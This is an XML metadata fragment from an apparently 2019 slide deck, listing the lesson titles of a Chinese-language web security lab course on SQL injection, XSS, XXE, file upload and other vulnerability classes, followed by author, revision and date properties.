      <vt:lpstr>Less-01_显错注入_01</vt:lpstr>
      <vt:lpstr>Less-01_显错注入_02</vt:lpstr>
      <vt:lpstr>补充知识_01</vt:lpstr>
      <vt:lpstr>补充知识_02</vt:lpstr>
      <vt:lpstr>Less-02_布尔注入_01</vt:lpstr>
      <vt:lpstr>Less-02_布尔注入_02</vt:lpstr>
      <vt:lpstr>Less-03_延时注入</vt:lpstr>
      <vt:lpstr>Less-04_ post注入_01</vt:lpstr>
      <vt:lpstr>Less-04_ post注入_02</vt:lpstr>
      <vt:lpstr>less-05_过滤注入</vt:lpstr>
      <vt:lpstr>补充知识_宽字节  </vt:lpstr>
      <vt:lpstr>Less-06_宽字节注入</vt:lpstr>
      <vt:lpstr>补充知识_XXE注入漏洞</vt:lpstr>
      <vt:lpstr>Less-07_xxe注入</vt:lpstr>
      <vt:lpstr>补充知识_csv注入漏洞</vt:lpstr>
      <vt:lpstr>补充知识_01</vt:lpstr>
      <vt:lpstr>补充知识_02</vt:lpstr>
      <vt:lpstr>Less-09_反射型XSS</vt:lpstr>
      <vt:lpstr>Less-10_存储型xss</vt:lpstr>
      <vt:lpstr>Less-11_万能密码登陆</vt:lpstr>
      <vt:lpstr>Less-12_DOM型xss</vt:lpstr>
      <vt:lpstr>Less-13_过滤xss</vt:lpstr>
      <vt:lpstr>Less-14_链接注入</vt:lpstr>
      <vt:lpstr>补充知识_任意文件下载</vt:lpstr>
      <vt:lpstr>Less-15_任意文件下载</vt:lpstr>
      <vt:lpstr>Less-16_mysql配置文件下载</vt:lpstr>
      <vt:lpstr>补充知识_文件上传漏洞</vt:lpstr>
      <vt:lpstr>Less-17_文件上传(前端拦截)</vt:lpstr>
      <vt:lpstr>Less-18_文件上传(解析漏洞)</vt:lpstr>
      <vt:lpstr>Less-19_文件上传(畸形文件)</vt:lpstr>
      <vt:lpstr>Less-20_文件上传(截断上传)</vt:lpstr>
      <vt:lpstr>Less-21_文件上传(htaccess)_01</vt:lpstr>
      <vt:lpstr>Less-21_文件上传(htaccess)_02</vt:lpstr>
      <vt:lpstr>Less-22_越权修改密码</vt:lpstr>
      <vt:lpstr>Less-23_支付漏洞</vt:lpstr>
      <vt:lpstr>Less-24_邮箱轰炸</vt:lpstr>
      <vt:lpstr>Less-25_越权查看admin</vt:lpstr>
      <vt:lpstr>Less-26_URL跳转</vt:lpstr>
      <vt:lpstr>Less-26_文件包含漏洞</vt:lpstr>
      <vt:lpstr>Less-27_命令执行</vt:lpstr>
      <vt:lpstr>Less-29_webshell爆破</vt:lpstr>
      <vt:lpstr>Less-30_ssrf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crow</cp:lastModifiedBy>
  <cp:revision>384</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-18T11:44:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-05T16:58:13Z</dcterms:modified>
</cp:coreProperties>
</file>